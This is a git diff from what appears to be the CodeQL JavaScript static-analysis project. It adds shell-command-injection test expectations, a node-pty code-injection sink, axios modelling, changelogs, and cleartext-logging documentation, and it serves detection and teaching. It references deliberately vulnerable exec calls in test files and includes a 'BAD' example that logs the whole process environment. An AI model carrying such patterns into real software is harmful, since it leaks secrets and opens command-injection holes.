| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:1:30:64 | exec('c ... t) { }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:1:32:34 | execSyn ... path}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:1:34:54 | execSyn ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:1:36:77 | execSyn ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:43 | execSyn ... r/baz') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:54 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:40 | execSyn ... path}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:51 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:1:42:47 | execSyn ... File}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:31 | files.join(' ') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:1:44:34 | execSyn ... ' ')}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:31 | files.join(' ') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:1:46:37 | exec("c ... name") |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:1:48:41 | execSyn ... tool}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | execSyn ... + file) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:1:54:39 | execSyn ... + "'") |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:1:62:2 | execFil ... ut);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | console.log(stdout) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:1:66:2 | execFil ... r); \\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | console.log(stderr) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:1:72:2 | execFil ... ut);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | console.log(stdout) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:1:74:60 | execFil ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:1:76:39 | execFil ... xml' ]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:1:79:46 | execFil ... opts) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:1:82:90 | execFil ... String) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:1:84:115 | execFil ... ring'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:1:86:75 | execFil ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:35 | execSyn ... + foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:46 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:1:90:50 | execFil ... th}` ]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:1:92:46 | execFil ... th}` ]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:1:94:43 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:1:96:53 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:1:98:55 | exec("c ... h(out)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | doSomethingWith(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:1:100:56 | execFil ... ptions) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:1:102:56 | exec("n ... h(out)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | doSomethingWith(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:1:104:31 | execFil ... cat` ]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:1:106:44 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:1:107:44 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:1:108:44 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:1:109:44 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:1:111:51 | spawn(' ... it'] }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | spawn(' ... ename]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | cat.std ... );\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | res.write(data) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | cat.std ... .end()) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | res.end() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:12:121:64 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:15:123:67 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:20 | console.log(notDead) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | someCal ... ss.\\n ) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:1:140:36 | exec('/ ... s) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:1:142:12 | spawn("cat") |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:15:145:32 | require("shelljs") |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:61 | shelljs ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:47 | shelljs ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:81 | shelljs ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:14:150:35 | require ... spawn') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:1:152:82 | cspawn( ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:1:153:60 | cspawn( ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:1:154:26 | cspawn( ... /bar']) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:1:155:47 | cspawn( ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:46 | cspawn. ... /bar']) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:68 | cspawn. ... tf8' }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:15:161:29 | require('exec') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:1:162:56 | execmod ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:1:163:42 | execmod ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:1:164:76 | execmod ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | console.log(out) |
| autogenerated/TaintedPath/TaintedPath-es6.js:6:14:11:2 | createS ... )));\\n}) |
| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) |
| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | res.wri ... path))) |

16
javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_unit_tests/ExtractEndpointDataTraining.expected
View File

@@ -8,6 +8,11 @@ endpoints
| index.js:15:17:15:32 | req.body.isAdmin | NosqlInjection | isExcludedFromEndToEndEvaluation | false | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | NosqlInjection | notASinkReason | LoggerMethod | string |
| index.js:15:17:15:32 | req.body.isAdmin | NosqlInjection | sinkLabel | NotASink | string |
| index.js:15:17:15:32 | req.body.isAdmin | ShellCommandInjectionFromEnvironment | hasFlowFromSource | false | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | ShellCommandInjectionFromEnvironment | isConstantExpression | false | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | ShellCommandInjectionFromEnvironment | isExcludedFromEndToEndEvaluation | false | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | ShellCommandInjectionFromEnvironment | notASinkReason | LoggerMethod | string |
| index.js:15:17:15:32 | req.body.isAdmin | ShellCommandInjectionFromEnvironment | sinkLabel | NotASink | string |
| index.js:15:17:15:32 | req.body.isAdmin | SqlInjection | hasFlowFromSource | true | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | SqlInjection | isConstantExpression | false | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | SqlInjection | isExcludedFromEndToEndEvaluation | false | boolean |
@@ -42,6 +47,12 @@ endpoints
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | NosqlInjection | notASinkReason | ClientRequest | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | NosqlInjection | notASinkReason | JQueryArgument | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | NosqlInjection | sinkLabel | NotASink | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | hasFlowFromSource | false | boolean |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | isConstantExpression | false | boolean |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | isExcludedFromEndToEndEvaluation | false | boolean |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | notASinkReason | ClientRequest | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | notASinkReason | JQueryArgument | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | sinkLabel | NotASink | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | SqlInjection | hasFlowFromSource | false | boolean |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | SqlInjection | isConstantExpression | false | boolean |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | SqlInjection | isExcludedFromEndToEndEvaluation | false | boolean |
@@ -71,6 +82,11 @@ endpoints
| index.js:84:12:84:18 | foo.bar | NosqlInjection | isExcludedFromEndToEndEvaluation | false | boolean |
| index.js:84:12:84:18 | foo.bar | NosqlInjection | notASinkReason | ClientRequest | string |
| index.js:84:12:84:18 | foo.bar | NosqlInjection | sinkLabel | NotASink | string |
| index.js:84:12:84:18 | foo.bar | ShellCommandInjectionFromEnvironment | hasFlowFromSource | false | boolean |
| index.js:84:12:84:18 | foo.bar | ShellCommandInjectionFromEnvironment | isConstantExpression | false | boolean |
| index.js:84:12:84:18 | foo.bar | ShellCommandInjectionFromEnvironment | isExcludedFromEndToEndEvaluation | false | boolean |
| index.js:84:12:84:18 | foo.bar | ShellCommandInjectionFromEnvironment | notASinkReason | ClientRequest | string |
| index.js:84:12:84:18 | foo.bar | ShellCommandInjectionFromEnvironment | sinkLabel | NotASink | string |
| index.js:84:12:84:18 | foo.bar | SqlInjection | hasFlowFromSource | false | boolean |
| index.js:84:12:84:18 | foo.bar | SqlInjection | isConstantExpression | false | boolean |
| index.js:84:12:84:18 | foo.bar | SqlInjection | isExcludedFromEndToEndEvaluation | false | boolean |

1
javascript/ql/experimental/adaptivethreatmodeling/test/query_mappings/ExtractEndpointLabelEncoding.expected
View File

@@ -3,3 +3,4 @@
| 2 | NosqlInjectionSink |
| 3 | SqlInjectionSink |
| 4 | TaintedPathSink |
| 5 | ShellCommandInjectionFromEnvironmentSink |

11
javascript/ql/experimental/adaptivethreatmodeling/test/update_endpoint_test_files.py
View File

@@ -21,11 +21,16 @@ file_extensions_to_copy = ['.js', '.ts']
# Maps each security query to the test root path for that security query. Each test root path is the
# path of that test relative to a checkout of github/codeql.
test_root_relative_paths = {
'NosqlAndSqlInjection': 'javascript/ql/test/query-tests/Security/CWE-089',
'NosqlAndSqlInjection':
'javascript/ql/test/query-tests/Security/CWE-089',
'TaintedPath':
'javascript/ql/test/query-tests/Security/CWE-022/TaintedPath',
'Xss': 'javascript/ql/test/query-tests/Security/CWE-079',
'XssThroughDom': 'javascript/ql/test/query-tests/Security/CWE-116'
'Xss':
'javascript/ql/test/query-tests/Security/CWE-079',
'XssThroughDom':
'javascript/ql/test/query-tests/Security/CWE-116',
'ShellCommandInjectionFromEnvironment':
'javascript/ql/test/query-tests/Security/CWE-078',
}
logging.basicConfig(level=logging.INFO)

10
javascript/ql/lib/CHANGELOG.md
View File

@@ -1,3 +1,13 @@
## 0.4.2
### Minor Analysis Improvements
* Added sinks from the [`node-pty`](https://www.npmjs.com/package/node-pty) library to the `js/code-injection` query.
## 0.4.1
No user-facing changes.
## 0.4.0
### New Features

3
javascript/ql/lib/change-notes/released/0.4.1.md Normal file
View File

@@ -0,0 +1,3 @@
## 0.4.1
No user-facing changes.

5
javascript/ql/lib/change-notes/released/0.4.2.md Normal file
View File

@@ -0,0 +1,5 @@
## 0.4.2
### Minor Analysis Improvements
* Added sinks from the [`node-pty`](https://www.npmjs.com/package/node-pty) library to the `js/code-injection` query.

2
javascript/ql/lib/codeql-pack.release.yml
View File

@@ -1,2 +1,2 @@
---
lastReleaseVersion: 0.4.0
lastReleaseVersion: 0.4.2

2
javascript/ql/lib/qlpack.yml
View File

@@ -1,5 +1,5 @@
name: codeql/javascript-all
version: 0.4.1-dev
version: 0.4.3-dev
groups: javascript
dbscheme: semmlecode.javascript.dbscheme
extractor: javascript

8
javascript/ql/lib/semmle/javascript/NodeModuleResolutionImpl.qll
View File

@@ -87,7 +87,13 @@ File tryExtensions(Folder dir, string basename, int priority) {
* Or `name`, if `name` has no file extension.
*/
bindingset[name]
private string getStem(string name) { result = name.regexpCapture("(.+?)(?:\\.([^.]+))?", 1) }
private string getStem(string name) {
// everything before the last dot
result = name.regexpCapture("(.+?)(?:\\.([^.]+))?", 1)
or
// everything before the first dot
result = name.regexpCapture("^([^.]*)\\..*$", 1)
}
/**
* Gets a file that a main module from `pkg` exported as `mainPath` with the given `priority`.

19
javascript/ql/lib/semmle/javascript/frameworks/ClientRequests.qll
View File

@@ -197,6 +197,20 @@ module ClientRequest {
/** Gets the string `url` or `uri`. */
private string urlPropertyName() { result = "url" or result = "uri" }
/** An API entry-point for the global variable `axios`. */
private class AxiosGlobalEntryPoint extends API::EntryPoint {
AxiosGlobalEntryPoint() { this = "axiosGlobal" }
override DataFlow::SourceNode getASource() { result = DataFlow::globalVarRef("axios") }
}
/** Gets a reference to the `axios` library. */
private API::Node axios() {
result = API::moduleImport("axios")
or
result = API::root().getASuccessor(API::Label::entryPoint(any(AxiosGlobalEntryPoint entry)))
}
/**
* A model of a URL request made using the `axios` library.
*/
@@ -204,9 +218,10 @@ module ClientRequest {
string method;
AxiosUrlRequest() {
this = API::moduleImport("axios").getACall() and method = "request"
this = axios().getACall() and
method = "request"
or
this = API::moduleImport("axios").getMember(method).getACall() and
this = axios().getMember(method).getACall() and
method = [httpMethodName(), "request"]
}

6
javascript/ql/lib/semmle/javascript/frameworks/data/ModelsAsData.qll
View File

@@ -23,10 +23,10 @@ import Shared::ModelInput as ModelInput
import Shared::ModelOutput as ModelOutput
/**
* A remote flow source originating from a CSV source row.
* A remote flow source originating from a MaD source row.
*/
private class RemoteFlowSourceFromCsv extends RemoteFlowSource {
RemoteFlowSourceFromCsv() { this = ModelOutput::getASourceNode("remote").asSource() }
private class RemoteFlowSourceFromMaD extends RemoteFlowSource {
RemoteFlowSourceFromMaD() { this = ModelOutput::getASourceNode("remote").asSource() }
override string getSourceType() { result = "Remote flow" }
}

21
javascript/ql/lib/semmle/javascript/security/dataflow/CodeInjectionCustomizations.qll
View File

@@ -294,6 +294,27 @@ module CodeInjection {
}
}
/**
* An execution of a terminal command via the `node-pty` library, seen as a code injection sink.
* Example:
* ```JS
* var pty = require('node-pty');
* var ptyProcess = pty.spawn("bash", [], {...});
* ptyProcess.write('ls\r');
* ```
*/
class NodePty extends Sink {
NodePty() {
this =
API::moduleImport("node-pty")
.getMember("spawn")
.getReturn()
.getMember("write")
.getACall()
.getArgument(0)
}
}
/** A sink for code injection via template injection. */
abstract private class TemplateSink extends Sink {
deprecated override string getMessageSuffix() {

4
javascript/ql/lib/semmle/javascript/security/dataflow/UnsafeShellCommandConstructionCustomizations.qll
View File

@@ -92,9 +92,7 @@ module UnsafeShellCommandConstruction {
StringConcatEndingInCommandExecutionSink() {
this = root.getALeaf() and
root = isExecutedAsShellCommand(DataFlow::TypeBackTracker::end(), sys) and
exists(string prev | prev = this.getPreviousLeaf().getStringValue() |
prev.regexpMatch(".* ('|\")?[0-9a-zA-Z/:_-]*")
)
exists(this.getPreviousLeaf().getStringValue()) // looks like a shell command construction that could be done safer, it has a known prefix
}
override string getSinkType() { result = "string concatenation" }

8
javascript/ql/src/CHANGELOG.md
View File

@@ -1,3 +1,11 @@
## 0.5.2
No user-facing changes.
## 0.5.1
No user-facing changes.
## 0.5.0
### Minor Analysis Improvements

31
javascript/ql/src/Security/CWE-312/CleartextLogging.qhelp
View File

@@ -2,4 +2,33 @@
"-//Semmle//qhelp//EN"
"qhelp.dtd">
<qhelp>
<include src="CleartextStorage.qhelp" /></qhelp>
<overview>
<p>If sensitive data is written to a log entry it could be exposed to an attacker
who gains access to the logs.</p>
<p>Potential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may
expose system information such as full path names, system information, and sometimes usernames and passwords.</p>
</overview>
<recommendation>
<p>
Sensitive data should not be logged.
</p>
</recommendation>
<example>
<p>In the example the entire process environment is logged using `console.info`. Regular users of the production deployed application
should not have access to this much information about the environment configuration.
</p>
<sample src="examples/CleartextLogging.js" />
<p> In the second example the data that is logged is not sensitive.</p>
<sample src="examples/CleartextLoggingGood.js" />
</example>
<references>
<li>OWASP: <a href="https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/">Insertion of Sensitive Information into Log File</a>.</li>
</references>
</qhelp>

2
javascript/ql/src/Security/CWE-312/examples/CleartextLogging.js Normal file
View File

@@ -0,0 +1,2 @@
// BAD: Logging cleartext sensitive data
console.info(`[INFO] Environment: ${process.env}`);

3
javascript/ql/src/Security/CWE-312/examples/CleartextLoggingGood.js Normal file
View File

@@ -0,0 +1,3 @@
let not_sensitive_data = { a: 1, b : 2}
// GOOD: it is fine to log data that is not sensitive
console.info(`[INFO] Some object contains: ${not_sensitive_data}`);

2
javascript/ql/src/Security/CWE-770/examples/MissingRateLimitingGood.js
View File

@@ -3,7 +3,7 @@ var app = express();
// set up rate limiter: maximum of five requests per minute
var RateLimit = require('express-rate-limit');
var limiter = new RateLimit({
var limiter = RateLimit({
windowMs: 1*60*1000, // 1 minute
max: 5
});

3
javascript/ql/src/change-notes/released/0.5.1.md Normal file
View File

@@ -0,0 +1,3 @@
## 0.5.1
No user-facing changes.

3
javascript/ql/src/change-notes/released/0.5.2.md Normal file
View File

@@ -0,0 +1,3 @@
## 0.5.2
No user-facing changes.

2
javascript/ql/src/codeql-pack.release.yml
View File

@@ -1,2 +1,2 @@
---
lastReleaseVersion: 0.5.0
lastReleaseVersion: 0.5.2

2
javascript/ql/src/qlpack.yml
View File

@@ -1,5 +1,5 @@
name: codeql/javascript-queries
version: 0.5.1-dev
version: 0.5.3-dev
groups:
- javascript
- queries

10
javascript/ql/test/library-tests/frameworks/ClientRequests/ClientRequests.expected
View File

@@ -5,6 +5,8 @@ test_ClientRequest
| apollo.js:17:1:17:34 | new Pre ... yurl"}) |
| apollo.js:20:1:20:77 | createN ... phql'}) |
| apollo.js:23:1:23:31 | new Web ... wsUri}) |
| axiosTest.js:4:5:7:6 | axios({ ... \\n }) |
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) |
| puppeteer.ts:6:11:6:42 | page.go ... e.com') |
| puppeteer.ts:8:5:8:61 | page.ad ... css" }) |
| puppeteer.ts:18:30:18:50 | page.go ... estUrl) |
@@ -90,6 +92,8 @@ test_ClientRequest
| tst.js:296:5:299:6 | axios({ ... \\n }) |
| tst.js:312:12:312:36 | fetchPo ... o/bar') |
test_getADataNode
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:15:18:15:55 | { 'Cont ... json' } |
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:16:15:16:35 | {x: 'te ... 'test'} |
| tst.js:53:5:53:23 | axios({data: data}) | tst.js:53:18:53:21 | data |
| tst.js:57:5:57:39 | axios.p ... data2}) | tst.js:57:19:57:23 | data1 |
| tst.js:57:5:57:39 | axios.p ... data2}) | tst.js:57:33:57:37 | data2 |
@@ -143,6 +147,10 @@ test_getUrl
| apollo.js:17:1:17:34 | new Pre ... yurl"}) | apollo.js:17:26:17:32 | "myurl" |
| apollo.js:20:1:20:77 | createN ... phql'}) | apollo.js:20:30:20:75 | 'https: ... raphql' |
| apollo.js:23:1:23:31 | new Web ... wsUri}) | apollo.js:23:25:23:29 | wsUri |
| axiosTest.js:4:5:7:6 | axios({ ... \\n }) | axiosTest.js:4:11:7:5 | {\\n ... ,\\n } |
| axiosTest.js:4:5:7:6 | axios({ ... \\n }) | axiosTest.js:6:14:6:16 | url |
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:12:11:17:5 | {\\n ... }\\n } |
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:14:14:14:16 | url |
| puppeteer.ts:6:11:6:42 | page.go ... e.com') | puppeteer.ts:6:21:6:41 | 'https: ... le.com' |
| puppeteer.ts:8:5:8:61 | page.ad ... css" }) | puppeteer.ts:8:29:8:58 | "http:/ ... le.css" |
| puppeteer.ts:18:30:18:50 | page.go ... estUrl) | puppeteer.ts:18:40:18:49 | requestUrl |
@@ -233,6 +241,8 @@ test_getUrl
| tst.js:296:5:299:6 | axios({ ... \\n }) | tst.js:298:14:298:44 | "http:/ ... -axios" |
| tst.js:312:12:312:36 | fetchPo ... o/bar') | tst.js:312:26:312:35 | '/foo/bar' |
test_getAResponseDataNode
| axiosTest.js:4:5:7:6 | axios({ ... \\n }) | axiosTest.js:4:5:7:6 | axios({ ... \\n }) | json | true |
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:12:5:17:6 | axios({ ... \\n }) | json | true |
| tst.js:19:5:19:23 | requestPromise(url) | tst.js:19:5:19:23 | requestPromise(url) | text | true |
| tst.js:21:5:21:23 | superagent.get(url) | tst.js:21:5:21:23 | superagent.get(url) | stream | true |
| tst.js:25:5:25:14 | axios(url) | tst.js:25:5:25:14 | axios(url) | | true |

21
javascript/ql/test/library-tests/frameworks/ClientRequests/axiosTest.js Normal file
View File

@@ -0,0 +1,21 @@
//Use of axios as a global variable instead of an imported module to make Ajax calls
var testvar = function () {
axios({
method: 'get',
url: url,
}).then(function (response) {
console.log(response.data) })
axios({
method: 'post',
url: url,
headers: { 'Content-Type': 'application/json' },
data: {x: 'test', y:'test'}
}).then(function (response) {
console.log(response.data) })
}

10
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected
View File

@@ -57,6 +57,8 @@ nodes
| lib/lib.js:64:41:64:44 | name |
| lib/lib.js:65:22:65:25 | name |
| lib/lib.js:65:22:65:25 | name |
| lib/lib.js:69:27:69:30 | name |
| lib/lib.js:69:27:69:30 | name |
| lib/lib.js:71:28:71:31 | name |
| lib/lib.js:71:28:71:31 | name |
| lib/lib.js:73:21:73:24 | name |
@@ -116,6 +118,7 @@ nodes
| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" |
| lib/lib.js:181:21:181:24 | name |
| lib/lib.js:181:21:181:46 | name.re ... "'\\''") |
| lib/lib.js:181:21:181:46 | name.re ... "'\\''") |
| lib/lib.js:182:22:182:27 | broken |
| lib/lib.js:182:22:182:27 | broken |
| lib/lib.js:186:34:186:37 | name |
@@ -385,6 +388,10 @@ edges
| lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name |
@@ -463,6 +470,7 @@ edges
| lib/lib.js:181:6:181:52 | broken | lib/lib.js:182:22:182:27 | broken |
| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | lib/lib.js:181:6:181:52 | broken |
| lib/lib.js:181:21:181:24 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") |
| lib/lib.js:181:21:181:24 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") |
| lib/lib.js:181:21:181:46 | name.re ... "'\\''") | lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" |
